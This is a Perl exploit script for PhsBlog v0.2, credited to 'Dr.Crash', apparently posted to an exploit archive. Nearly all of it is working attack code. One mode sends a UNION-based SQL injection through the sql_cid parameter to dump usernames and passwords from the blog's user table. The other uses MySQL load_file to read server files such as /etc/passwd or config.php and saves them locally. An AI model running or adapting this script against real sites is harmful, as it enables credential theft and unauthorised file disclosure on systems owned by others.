phsBlog 0.2 Bypass SQL Injection Filtering Exploit

#!/usr/bin/perl

#—————————————————————-

#

#Script : PhsBlog v0.2

#

#Type : Bypass Sql injection Filtering Exploit

#

#Method : GET

#

#Risk : High

#

#—————————————————————-

#

#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash

#

#My Official Website : HTTP://FEREIDANI.IR

#

#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com

#

#—————————————————————-

#

#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR

#

#—————————————————————-

#

#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip

#

#—————————————————————-

#

# Tnx : God

#

# HTTP://IRCRASH.COM

#

#—————————————————————-

use LWP;

use HTTP::Request;

use Getopt::Long;

$scriptname="PhsBlog v0.2";

sub header

{

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************";

}

sub usage

{

print "

* Usage : perl $0 http://Example/

****************************************************

";

}

$url = ($ARGV[0]);

if(!$url)

{

header();

usage();

exit;

}

if($url !~ /\\//){$url = $url."/";}

if($url !~ /http:\\/\\//){$url = "http://".$url;}

sub xpl1()

{

#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)

$vul = "/index.php?sql_cid=999\’union select 0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12 from phsblog_users/*";

$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( \’Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9\’ );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type(\’application/x-www-form-urlencoded\’);

$req->header("content-length" => $contlen);

$req->content($poststring);

$response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string();

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

@password = split(/Password:/,$content);

$password = @password[1];

@password = split(/<endpass>/,$password);

$password = @password[0];

if(!$name && !$password)

{

print "\\n\\n";

print "!Exploit failed ! :(\\n\\n";

exit;

}

print "\\n Username: ".$name."\\n\\n";

print " Password: " .$password."\\n\\n";

}

#XPL2

sub xpl2()

{

print "\\n Example For File Address : /home/user/public_html/config.php\\n Or /etc/passwd";

print "\\n Enter File Address :";

$fil3 = <stdin>;

#index.php?sql_cid=999\’union select 0,1,2,3,4,concat(0x4c6f67696e3a,load_file(\’$fil3\’),0x3c656e64757365723e),6,7,8,9,10,11,12 from phsblog_users/*

$vul = "?show=pickup&sid=99999\’ union select 0,concat(0x4c6f67696e3a,load_file(\’$fil3\’),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13 from mysql.user/*";

$requestpage = $url.$vul;

my $req = HTTP::Request->new("POST",$requestpage);

$ua = LWP::UserAgent->new;

$ua->agent( \’Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9\’ );

#$req->referer($url);

$req->referer("IRCRASH.COM");

$req->content_type(\’application/x-www-form-urlencoded\’);

$req->header("content-length" => $contlen);

$req->content($poststring);

$response = $ua->request($req);

$content = $response->content;

$header = $response->headers_as_string();

@name = split(/Login:/,$content);

$name = @name[1];

@name = split(/<enduser>/,$name);

$name = @name[0];

if(!$name && !$password)

{

print "\\n\\n";

print "!Exploit failed ! :(\\n\\n";

exit;

}

open (FILE, ">".source.".txt");

print FILE $name;

close (FILE);

print " File Save In source.txt\\n";

print "";

}

#XPL2 END

#Starting;

print "

****************************************************

* $scriptname

****************************************************

*Discovered by : Khashayar Fereidani *

*Exploited by : Khashayar Fereidani *

*My Official Website : http://fereidani.ir *

****************************************************

* Mod Options : *

* Mod 1 : Find Script username and password *

* Mod 2 : File Disclosure(not work in many servers)*

****************************************************";

print "\\n \\n Enter Mod : ";

$mod=<stdin>;

if ($mod=="1" or $mod=="2") { print "\\n Exploiting ………….. \\n"; } else { print "\\n Unknown Mod ! \\n Exploit Failed !"; };

if ($mod=="1") { xpl1(); };

if ($mod=="2") { xpl2(); };